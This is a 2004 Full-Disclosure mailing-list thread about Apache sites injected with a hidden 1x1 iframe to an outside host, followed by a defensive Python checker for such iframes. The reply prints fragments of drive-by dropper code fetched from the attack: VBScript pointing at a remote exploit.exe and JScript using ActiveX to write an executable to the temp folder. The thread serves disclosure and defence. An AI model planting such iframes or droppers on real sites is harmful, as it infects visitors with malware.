Re: [Full-Disclosure] browser hijack by apache sites

From: D B (geggam692000_at_yahoo.com)
Date: 05/23/04

    To: filbert@pandora.be
    Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)
    
    

    Using Konqueror I got it to download these two files

    Filename 1: 2DimensionOfExploitsEnc.php

    <html>

    <script language=vbs>
    szURL = "http://www.pizdato.biz/acc1/exploit.exe"
    </script>

    <script language="VBScript.Encode">

    Filename 2: object2.cfm

    <script language=jscript>
    self.moveTo(5000,5000);
    self.close();
    fs=new ActiveXObject("Scripting.FileSystemObject");
    fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
    a=fs.CreateTextFile(fname,true);
    a.Write('MZ');
    a.Close();
    a=fs.OpenTextFile(fname,8,false,true);

    >Message: 1
    >From: Filbert <filbert@pandora.be>
    >Reply-To: filbert@pandora.be
    >To: full-disclosure@lists.netsys.com
    >Date: Sun, 23 May 2004 15:19:30 +0200
    >Organization: Hell
    >Subject: [Full-Disclosure] browser hijack by apache sites

    >Hi,

    >This is the second time this weekend that I've been warned of an apache
    >site on a Linux server where a line of code was added to redirect
    >browsers to porn sites.
    >First was the site of a Belgian political party. Second came today, and
    >as of writing this it's still there. The admin was informed so it can be
    >gone soon.

    >hxxp://www.previsit.com/carrefour/nl/ <- hxxp must be changed to http
    >IE users do NOT click.

    >the code added at the bottom is:

    ><iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></iframe></body>

    >Anyone seen this before? What vulnerability is exploited here? FP?

    >Thx,
    >Filb.

            
                    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
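
A defender-side check for the injection described in this thread, as an added example that is not part of the original posts: it scans a page's HTML for iframes that are effectively invisible (width or height of 0 or 1, or hidden by style) and that load from a host other than the site's own. The function names and the sample page are constructed for illustration; the injected tag in the sample is the one quoted in the message above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

def _tiny(value):
    # True for a 0- or 1-pixel dimension such as "1", "0" or "1px".
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class _IframeAudit(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        # Relative URLs have no host and are treated as same-site.
        if hidden and host and host != self.site_host:
            line, _ = self.getpos()
            self.findings.append({"line": line, "src": src, "host": host})

def find_hidden_iframes(html, site_host):
    parser = _IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: two visible iframes plus the tag quoted in the thread.
SAMPLE = """<html><body>
<h1>Store locator</h1>
<iframe src="/map/embed" width="600" height="400"></iframe>
<iframe src="http://maps.example.org/embed" width="600" height="400"></iframe>
<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body>
</html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE, "www.previsit.com"):
        print(f"line {f['line']}: hidden external iframe -> {f['src']}")
```

Run over the document root on a schedule, a check like this flags the appended tag without needing to know the destination host in advance.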

